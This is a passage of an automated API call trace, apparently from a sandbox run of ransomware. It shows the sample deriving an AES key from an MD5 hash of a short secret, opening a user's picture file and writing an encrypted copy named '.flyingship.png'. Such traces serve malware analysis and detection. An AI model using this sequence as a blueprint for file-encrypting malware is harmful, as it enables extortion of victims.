lpString2=".", cchCount2=1) returned 2 [0191.143] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.143] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.143] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.143] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.143] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.143] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd54bd6e0, ftCreationTime.dwHighDateTime=0x1d5dc96, ftLastAccessTime.dwLowDateTime=0x4b84be50, ftLastAccessTime.dwHighDateTime=0x1d5d858, ftLastWriteTime.dwLowDateTime=0x4b84be50, ftLastWriteTime.dwHighDateTime=0x1d5d858, nFileSizeHigh=0x0, nFileSizeLow=0x158e9, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="ITYvcRMYOFcy 0-.png", cAlternateFileName="ITYVCR~1.PNG")) returned 0x90af58 [0191.144] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0191.144] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.144] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0191.144] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.144] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.144] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0191.144] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.144] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0191.144] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.144] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.144] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0191.144] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.144] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.145] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.145] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.145] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.145] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0191.145] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.145] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0191.146] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.146] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.146] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0191.146] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.146] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.146] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.146] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.146] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.146] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0191.146] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.146] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.146] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.146] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.147] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.147] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.147] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0191.147] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.147] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.147] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0191.147] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.147] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.147] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0191.147] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.147] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.147] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0191.147] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.147] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.147] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.147] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.147] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.147] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.148] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.148] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0191.148] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.148] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.148] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0191.148] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.148] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.148] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.148] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.148] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0191.148] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.148] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.148] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.148] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.148] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.148] CryptHashData (hHash=0x90ae18, pbData=0x8ded08, dwDataLen=0x19, dwFlags=0x1) returned 1 [0191.148] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.148] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.149] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.149] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.149] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.149] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0191.149] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.149] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.149] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0191.149] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.149] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.149] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.149] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.149] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.149] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.150] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0191.150] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.150] CryptDestroyHash (hHash=0x90ae18) returned 1 [0191.150] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.150] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.150] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.150] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.150] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.150] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ityvcrmyofcy 0-.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0191.151] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.151] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0191.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0191.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0191.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0191.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0191.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0191.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0191.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0191.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0191.151] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0191.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0191.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0191.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0191.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0191.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0191.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0191.152] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0191.152] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0191.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0191.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0191.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0191.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0191.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0191.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0191.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0191.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0191.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0191.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0191.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0191.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0191.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0191.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0191.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0191.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0191.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0191.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0191.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0191.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0191.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0191.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0191.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0191.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0191.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0191.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0191.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0191.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0191.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0191.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0191.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0191.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9238c0 [0191.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0191.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0191.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0191.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0191.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0191.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0191.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0191.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0191.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0191.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0191.154] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures")) returned 0x11 [0191.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0191.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0191.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0191.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0191.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0191.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0191.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0191.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0191.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0191.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0191.155] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.flyingship.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ityvcrmyofcy 0-.flyingship.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0191.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0191.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0191.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0191.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0191.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0191.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0191.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0191.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0191.156] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.157] RtlAllocateHeap 